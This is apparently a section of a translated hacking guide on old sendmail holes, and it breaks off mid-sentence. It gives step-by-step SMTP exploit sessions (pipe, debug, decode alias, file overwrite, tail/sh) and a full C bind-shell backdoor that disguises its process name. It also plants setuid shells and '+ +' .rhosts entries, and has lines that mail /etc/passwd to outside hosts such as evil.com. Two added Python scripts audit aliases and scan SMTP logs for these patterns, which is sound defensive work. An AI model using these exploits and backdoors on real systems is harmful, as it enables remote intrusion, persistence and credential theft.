--[ 1.4.3 sendmail
Sendmail is the most widely used mail transfer agent (MTA) for sending and receiving mail in Unix environments. It is extensible, highly configurable, and extremely complex. Sendmail's widespread deployment on the Internet makes it a prime target for attackers, and several flaws have been discovered over the past few years. In fact, the very first CERT/CC advisory, issued in 1988, described an exploitable vulnerability in Sendmail. Many of these vulnerabilities involve remote buffer overflow conditions; input validation attacks have also been found. The once-popular Sendmail pipe attack inserted a pipe character into a particular field of an e-mail message, forcing sendmail to execute commands, which allowed a remote attacker to run commands with root privileges. The following commands are typed interactively to exploit this vulnerability:

    helo
    mail from: |
    rcpt to: bounce
    data
    .
    mail from: bin
    rcpt to: | sed '1,/^$/d' | sh
    data

Concretely: this hole lets a remote user obtain bin privileges, which in practice is as good as root ;-). First telnet to port 25 of the target host, then enter the following:

    helo
    mail from: |
    rcpt to: bounce
    data
    .
    mail from: bin
    rcpt to: | sed '1,/^$/d' | sh
    data
    cat > /tmp/a.c <<EOF
    #define PORT 1234
    #include <stdio.h>
    #include <signal.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
    struct sockaddr_in serv_addr;
    struct sockaddr_in client_addr;

    int main (int argc, char *argv[])
    {
        int i;
        /* wipe the command line so the process list shows a harmless name */
        for (i = 0; i < argc; i++) {
            memset(argv[i], '\0', strlen(argv[i]));
        };
        strcpy(argv[0], "th1s iz mY 3l1t3 baCkd00r");
        soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (soc_des == -1) exit(-1);
        bzero((char *) &serv_addr, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
        serv_addr.sin_port = htons(PORT);
        soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
        if (soc_rc != 0) exit(-1);
        /* detach from the controlling terminal and session */
        if (fork() != 0) exit(0);
        setpgrp();
        signal(SIGHUP, SIG_IGN);
        if (fork() != 0) exit(0);
        soc_rc = listen(soc_des, 5);
        if (soc_rc != 0) exit(0);
        while (1) {
            soc_len = sizeof(client_addr);
            soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
            if (soc_cli < 0) exit(0);
            cli_pid = getpid();
            server_pid = fork();
            if (server_pid != 0) {
                /* hand the connected socket to a shell as stdin/stdout/stderr */
                dup2(soc_cli, 0);
                dup2(soc_cli, 1);
                dup2(soc_cli, 2);
                execl("/bin/sh", "sh", (char *)0);
                close(soc_cli);
                exit(0);
            }
            close(soc_cli);
        }
    }
    EOF
    gcc -o /tmp/a /tmp/a.c
    /tmp/a
    .
    quit

Then telnet to port 1234 on the target host and you have a shell as the bin user!
Besides the common buffer overflow and input validation attacks, it is also possible to exploit sendmail's own features to obtain privileged access. One common technique is to create or modify a user's ~/.forward file via ftp or NFS. Here is an example:

    [vitter]$ cat > .forward
    |"cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell"
    <ctrl> D
    [vitter]$ cat .forward
    |"cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell"

After creating this file the attacker uploads it to the target system and then simply sends mail to the victim account; executing the file spawns a shell whose privileges are those of the victim user.
A few more examples:

    # telnet victim.com 25
    Trying xxx.xxx.xxx.xxx...
    Connected to victim.com
    Escape character is '^]'.
    220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
    mail from: "|echo + >> /home/zen/.rhosts"
    250 "|echo + >> /home/zen/.rhosts"... Sender ok
    rcpt to: nosuchuser
    550 nosuchuser... User unknown
    data
    354 Enter mail, end with "." on a line by itself
    .
    250 Mail accepted
    quit
    Connection closed by foreign host.
    # rsh victim.com -l zen csh -i
    Welcome to victim.com!
    $
WIZ = *ancient* = The oldest and easiest-to-exploit hole in sendmail is the wiz backdoor, though it is very hard to find nowadays. To use it: once connected, simply type "wiz" followed by "SHELL" and you get a root shell. [This backdoor is enabled through the sendmail.cf file…… the "OW" option followed by the encrypted password.]
DEBUG = *ancient* = This hole was once exploited by Robert T. Morris's Internet worm. It lets an attacker execute arbitrary programs on the remote machine: simply issue the debug command, use a pipe to /bin/sh, and place the commands you want to run in the message data. An attack example follows. [If the sendmail server answers "200 Debug set" to the debug command, the hole exists and can be exploited.] Example:
    #!/bin/sh
    telnet << EOF
    open fucked.host.edu 25
    debug
    mail from: </dev/null>
    rcpt to: <"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
    data
    cp /bin/sh /tmp/sushi      # or other commands, such as:
    chmod 4755 /tmp/sushi      # echo "+ +" >> /.rhosts
    .
    EOF
TURN = *ancient* = The TURN command can be used to steal other people's mail…… [Don't bother, far too old!]
Input buffer overflow = *ancient* = Can lock up the sendmail server…… [An old hole, collected here only for completeness.]

DECODE alias = *VrFy* = If the "/etc/aliases" file contains "|/usr/bin/uudecode", then anyone can mail decode and write arbitrary files as the user the sendmail server runs as. If one can also connect to the sendmail server directly, one can write arbitrary files as any user. You can test whether the decode alias exists as follows:

    % telnet target.com
    Trying 127.127.127.127
    Connected to target.com
    Escape character is '^]'.
    220 target.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
    expn decode
    250 <"|/usr/bin/uudecode">
    quit

This shows that the decode alias exists; now exploit it:

    % echo "myhost.com" | uuencode /usr/bin/.rhosts | mail decode@target.com

Next:

    % cat > outfile        # make our .rhosts file
    + +
    ^C
    % uuencode outfile /usr/bin/.rhosts
    begin 644 /bin/.rhosts
    $*R'K"O                # this is the uuencoded "+ +"

    % telnet fuqdhost.com 25
    220 fuqdhost.com SunOS Sendmail 8.6.1 #5 ready at Fri, 13 May 99 00:00 (EST)
    VRFY decode
    250 <|/usr/bin/uudecode>
    MAIL FROM: bin
    250 ... Sender Okay
    RCPT TO: decode
    250 ... Recipient Okay
    DATA
    354 Enter mail, end with "." on a line by itself
    begin 644 /bin/.rhosts
    $*R'K"O
    end
    .
    250 Mail accepted
    quit
    221 fuqdhost.com closing connection
    Connection closed by foreign host.

Then you can rlogin straight in with no password check!

    % rlogin fuqdhost.com -l bin
    $
If there is no writable home directory, you can instead craft a fake /etc/aliases.pag file containing an alias for the command you want to run on the remote host. This works because on many systems the aliases.pag and aliases.dir files that control the system mail aliases are world-writable.

    evil % cat decode
    bin: "| cat /etc/passwd | mail zen@evil.com"
    evil % newaliases -oQ/tmp -oA`pwd`/decode
    evil % uuencode decode.pag /etc/aliases.pag | mail decode@victim.com
    evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null
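The three host-side weaknesses above (a ~/.forward that pipes mail into a command, a program alias such as decode in /etc/aliases, and a world-writable alias database) can all be checked from the defender's side with a small audit script. The following Python is an added example written for this edit, not code from the original text or from sendmail; the alias and .forward contents it parses are constructed samples, and the database paths it checks are assumptions about where aliases.pag/aliases.dir/aliases.db normally live.

```python
"""Audit helpers for the sendmail misconfigurations described above.

Added example (not from the original text): finds program ("|cmd") aliases
such as decode in /etc/aliases syntax, flags ~/.forward entries that pipe
mail into a command, and reports world-writable alias database files.
"""
import os
import re
import stat

# Constructed sample /etc/aliases content (not taken from a real system).
SAMPLE_ALIASES = """\
# Basic system aliases -- these MUST be present.
MAILER-DAEMON: postmaster
postmaster: root

# General redirections for pseudo accounts.
bin:      root
decode:   "|/usr/bin/uudecode"
nobody:   /dev/null
"""

# Constructed sample ~/.forward content (the pattern shown earlier in the text).
SAMPLE_FORWARD = '|"cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell"\n'

# A target is a program alias when, after optional whitespace/quote, it starts with '|'.
PROGRAM_RE = re.compile(r'^\s*"?\s*\|')


def parse_aliases(text):
    """Return {alias: [targets]} from /etc/aliases-style text.

    Handles comments, blank lines and continuation lines (leading whitespace).
    Targets are split on commas, so a quoted command that itself contains a
    comma is split too; that is acceptable for flagging, not for rewriting.
    """
    aliases = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0].isspace() and current is not None:
            aliases[current].extend(t.strip() for t in raw.split(",") if t.strip())
            continue
        name, _, rhs = raw.partition(":")
        current = name.strip().lower()
        aliases[current] = [t.strip() for t in rhs.split(",") if t.strip()]
    return aliases


def program_aliases(text):
    """Return {alias: [program targets]} for every alias that pipes mail into a command."""
    result = {}
    for name, targets in parse_aliases(text).items():
        progs = [t for t in targets if PROGRAM_RE.match(t)]
        if progs:
            result[name] = progs
    return result


def forward_pipes(text):
    """Return the command entries found in ~/.forward text (one per line or comma)."""
    found = []
    for line in text.splitlines():
        for entry in line.split(","):
            entry = entry.strip()
            if PROGRAM_RE.match(entry):
                found.append(entry)
    return found


def world_writable(mode):
    """True if an st_mode value grants write permission to 'other'."""
    return bool(mode & stat.S_IWOTH)


def audit_alias_db(paths=("/etc/aliases.pag", "/etc/aliases.dir", "/etc/aliases.db")):
    """Return the subset of alias database files that exist and are world-writable.

    The default paths are an assumption; adjust them to the local sendmail layout.
    """
    bad = []
    for p in paths:
        try:
            st = os.stat(p)
        except FileNotFoundError:
            continue
        if world_writable(st.st_mode):
            bad.append(p)
    return bad


if __name__ == "__main__":
    print("program aliases:", program_aliases(SAMPLE_ALIASES))
    print(".forward pipes:", forward_pipes(SAMPLE_FORWARD))
    print("world-writable alias dbs:", audit_alias_db())
```

Run it against the real /etc/aliases and each user's ~/.forward (reading the files into the functions) to get the list of program aliases that should be removed or restricted, and to confirm the alias database is not writable by anyone but root.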
OVERWRITE FILES = fixed in 5.59 = A remote user can write to any file on the system that is not owned by root. This hole was fixed in Berkeley version 5.59, so the following only applies to sendmail before 5.59. Assume we attack from evil.com:

    % cat evil_sendmail
    telnet victim.com 25 << EOSM
    rcpt to: /home/zen/.rhosts
    mail from: zen
    data
    random garbage
    .
    rcpt to: /home/zen/.rhosts
    mail from: zen
    data
    evil.com
    .
    quit
    EOSM

    evil % /bin/sh evil_sendmail
    Trying 128.128.128.1
    Connected to victim.com
    Escape character is '^]'.
    Connection closed by foreign host.

    evil % rlogin victim.com -l zen
    Welcome to victim.com!
    victim %

'|PROGRAM' = tested on 5.55 = ...other versions may have this hole as well. Anyone can remotely execute arbitrary shell commands by placing a path in the sender address. A typical attack that retrieves the passwd file looks like this:

    % telnet target.com 25
    Trying 123.456.789.0...
    Connected to target.com
    Escape character is '^]'.
    220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51
    mail from: "|/bin/mail me@myhost.com < /etc/passwd"
    250 "|/bin/mail me@myhost.com < /etc/passwd"... Sender ok
    rcpt to: mickeymouse
    550 mickeymouse... User unknown
    data
    354 Enter mail, end with "." on a line by itself
    .
    250 Mail accepted
    quit
    Connection closed by foreign host.
    %
Getting a shell via tail = 5.65 = Using the tail command together with a pipe character you can obtain a shell running as the sendmail daemon's user (usually root). Specifically:

    % telnet panix.com 25
    Trying 198.7.0.2 ...
    Connected to panix.com.
    Escape character is '^]'.
    220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13 -0500
    HELO
    250 Hello panix.com, why do you call yourself ?
    MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
    250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
    RCPT TO: root
    250 root... Recipient ok
    DATA
    354 Enter mail, end with "." on a line by itself
    From: jhawk@panix.com (John Hawkinson)
    To: jhawk@panix.com (John Hawkinson)
    Return-Receipt-To: |foobar
    Subject: This is a large hole in the ground.
    X-Disclaimer: We take no responsibility for what might happen

    Hi there. Wanna play ball?

    #!/bin/sh
    #The above line is just in case :-)
    echo This is a Serious Bug > /tmp/bug
    echo id reports: >> /tmp/bug
    /usr/bin/id >> /tmp/bug
    echo Fixing this would be good >> /tmp/bug
    cp /bin/sh /tmp/bugshell
    chmod u+s /tmp/bugshell
    echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug
    chmod ugo+rx /tmp/bugshell
    .
    250 Ok
    quit
    221 panix.com closing connection
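Every network-side attack in this section (the pipe attack, wiz/debug, the decode alias probe via VRFY/EXPN, the overwrite-files bug that names a path as recipient, and the tail/sh sender address) leaves a recognisable fingerprint in the client commands of the SMTP session. The following Python scanner is an added example written for this edit, not code from the original text or from sendmail; it takes a transcript of client commands (the constructed SAMPLE_SESSION, which mixes benign traffic with the lines shown above) and reports which commands match those patterns. Modern sendmail rejects all of them, so a hit in a live log indicates a probe, not necessarily a compromise.

```python
"""Scan an SMTP client-command transcript for the classic sendmail abuse patterns.

Added example (not from the original text). Only the client side of the
session is examined; server replies are ignored if present.
"""
import re

ENVELOPE_RE = re.compile(r'^(mail\s+from|rcpt\s+to)\s*:\s*(.*)$', re.IGNORECASE)
PROBE_RE = re.compile(r'^(vrfy|expn)\s+(\S+)', re.IGNORECASE)
# Commands that only exist in ancient/backdoored sendmail builds.
LEGACY_CMDS = {"wiz", "debug", "shell"}

# Constructed transcript (client commands only): benign traffic first, then the
# attack lines quoted earlier in this section.
SAMPLE_SESSION = """\
HELO relay.example.net
MAIL FROM: <alice@example.net>
RCPT TO: <bob@example.org>
DATA
QUIT
debug
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
RCPT TO: /home/zen/.rhosts
EXPN decode
mail from: "|/bin/mail me@myhost.com < /etc/passwd"
"""


def strip_brackets(addr):
    """Remove surrounding <...> and double quotes so the check sees the raw address text."""
    addr = addr.strip()
    if addr.startswith("<") and addr.endswith(">"):
        addr = addr[1:-1]
    return addr.strip().strip('"').strip()


def classify(line):
    """Return the list of reasons this client command looks like a sendmail attack (empty if benign)."""
    reasons = []
    stripped = line.strip()
    first = stripped.split(None, 1)[0].lower() if stripped else ""
    if first in LEGACY_CMDS:
        reasons.append(f"legacy {first} command")
    m = ENVELOPE_RE.match(stripped)
    if m:
        addr = strip_brackets(m.group(2))
        if "|" in addr:
            # Covers the pipe attack, the tail|sh sender and "|/bin/mail ..." senders.
            reasons.append("pipe character in envelope address")
        if addr.startswith("/"):
            # Covers the pre-5.59 overwrite-files bug (rcpt to: /home/zen/.rhosts).
            reasons.append("filesystem path as envelope address")
    m = PROBE_RE.match(stripped)
    if m and m.group(2).strip("<>").lower() == "decode":
        reasons.append(f"{m.group(1).upper()} probe for the decode alias")
    return reasons


def scan_session(text):
    """Return [(line_number, command, reasons)] for every suspicious client line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        reasons = classify(line)
        if reasons:
            hits.append((n, line, reasons))
    return hits


if __name__ == "__main__":
    for n, line, reasons in scan_session(SAMPLE_SESSION):
        print(f"line {n}: {line!r}: {', '.join(reasons)}")
```

The same classify() function can be applied to the command field of sendmail's own log lines or to a packet capture of port 25, which makes it a cheap detector for anyone still probing for these old holes.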
HP-UX = HP-UX 9.x = The sendmail shipped with HP-UX 9.x has a hole that lets an attacker create arbitrary files on the target system,